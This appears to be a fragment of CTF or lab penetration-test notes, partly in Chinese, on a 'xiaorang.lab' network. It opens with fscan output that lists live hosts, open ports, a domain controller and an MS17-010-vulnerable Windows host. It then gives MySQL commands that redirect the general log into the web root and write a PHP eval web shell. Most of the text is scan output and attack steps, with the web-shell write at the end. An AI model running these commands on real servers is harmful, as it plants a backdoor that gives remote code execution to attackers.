/var/www/./html >./fscan_amd64 -h 172.22.1.1/16 start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 172.22.1.15 is alive (icmp) Target 172.22.1.18 is alive (icmp) Target 172.22.1.21 is alive (icmp) Target 172.22.1.2 is alive [*] Icmp alive hosts len is: 4 存活的主机 172.22.1.2:139 open 172.22.1.21:139 open 172.22.1.18:139 open 172.22.1.2:135 open 172.22.1.21:135 open 172.22.1.18:135 open 172.22.1.18:80 open 172.22.1.15:80 open 172.22.1.15:22 open 172.22.1.18:3306 open 172.22.1.2:445 open 172.22.1.21:445 open 172.22.1.18:445 open 172.22.1.2:88 open [*] alive ports len is: 14 start vulscan [*] NetInfo: [*]172.22.1.2 DC,域控 [->]DC01 [->]172.22.1.2 [*] NetInfo: [*]172.22.1.21 win7 [->]XIAORANG-WIN7 [->]172.22.1.21 [*] NetInfo: [*]172.22.1.18 [->]XIAORANG-OA01 [->]172.22.1.18 [*] NetBios: 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [*]172.22.1.2 (Windows Server 2016 Datacenter 14393) [+]172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1) [*] NetBios: 172.22.1.2[+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393 [*] NetBios: 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600 [*] WebTitle: http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login [*] WebTitle: http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统 已完成 14/14 [*] 扫描结束,耗时: 42.792864245s
开启日志写入 set global general_log=ON 通过开启全日志getShell: 查询日志路径和是否允许写入 SHOW VARIABLES LIKE '%general%' 更新日志路径 set global general_log_file='C:/phpStudy/PHPTutorial/www/22.php' 通过查询将webshell写入日志 select '<?phpeval($_POST[shell]); ?>'